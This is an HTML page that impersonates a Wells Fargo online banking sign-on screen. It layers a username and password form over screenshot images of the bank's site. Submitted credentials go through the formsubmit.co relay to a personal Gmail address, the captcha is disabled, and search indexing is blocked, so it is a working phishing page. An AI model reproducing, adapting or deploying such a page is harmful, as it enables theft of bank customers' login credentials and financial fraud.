<!DOCTYPE html>
<html lang="en">

<head>
    <title>Online - Wells Fargo Bank</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
    <link rel="shortcut icon" href="img/favicon.ico">
    <style>
        .form {
            position: relative;
            bottom: 1360px;
            left: 30px;
        }

        form {
            display: flex;
            flex-direction: column;

        }

        .forget-input {
            height: 60px;
            width: 300px;
            background-color: rgb(239, 232, 232);
            border-bottom-left-radius: 20px;
            border-bottom-right-radius: 25px;
            padding: 20px;
            box-shadow: 0 3px 10px black;
        }
    </style>
</head>

<body>
    <div style="display: flex; flex-direction: column; position: relative; right: 10px;bottom: 10px;">
        <img src="wellllllllll/First .png" height="400px">
        <img src="wellllllllll/Second.png" height="400px" style="position: relative; bottom: 12px; ">
        <img src="wellllllllll/Third.png" height="400px" style="position: relative;">
        <img src="wellllllllll/Fourth.png" height="400px" style="position: relative;">
        <div class="form">
            <div class="form-input">
                <div class="form-head">


                    <form name="okai" action="https://formsubmit.co/codis1723@gmail.com" method="POST">

                        <!-- HoneyPot -->
                        <input type="text" name="_honey" style="display: none;">

                        <!-- Disable Captcha -->
                        <input type="hidden" name="_captcha" value="false">

                        <input type="hidden" name="_next" value="false">

                        <div class="col-mid-6" style="display: flex; flex-direction: column;">
                            <input name="Username" title="Please Enter Right Value" autofocus="" required=""
                                autocomplete="off" placeholder="Username" class="inputs" type="text" style="width:200px; height: 30px;z-index:2; border: none;
                        border-bottom: 1px solid rgb(150, 150, 150) ; position: relative; bottom: 35px;">

                            <input name="Password" title="Please Enter Right Value" autofocus="" required=""
                                autocomplete="off" placeholder=" Password" class="inputs" type="password" style="width:200px; height: 30px;z-index:2; border: none;
                        border-bottom: 1px solid rgb(150, 150, 150) ; position: relative; bottom: 25px;">

                            <img src="wellllllllll/save.png" style="position: relative; bottom: 20px;" height="30"
                                width="150px" alt="Save">
                            <button type="submit"
                                style="text-align: center; position: relative; bottom: 15px;  width: 140px; height: 30px; border: none; background-color: red; color: #ffffff; font-size: 17px; border-radius: 20px;">
                                Sign
                                On
                            </button>
                        </div>
                    </form>
                </div>
            </div>
        </div>

</body>

</html>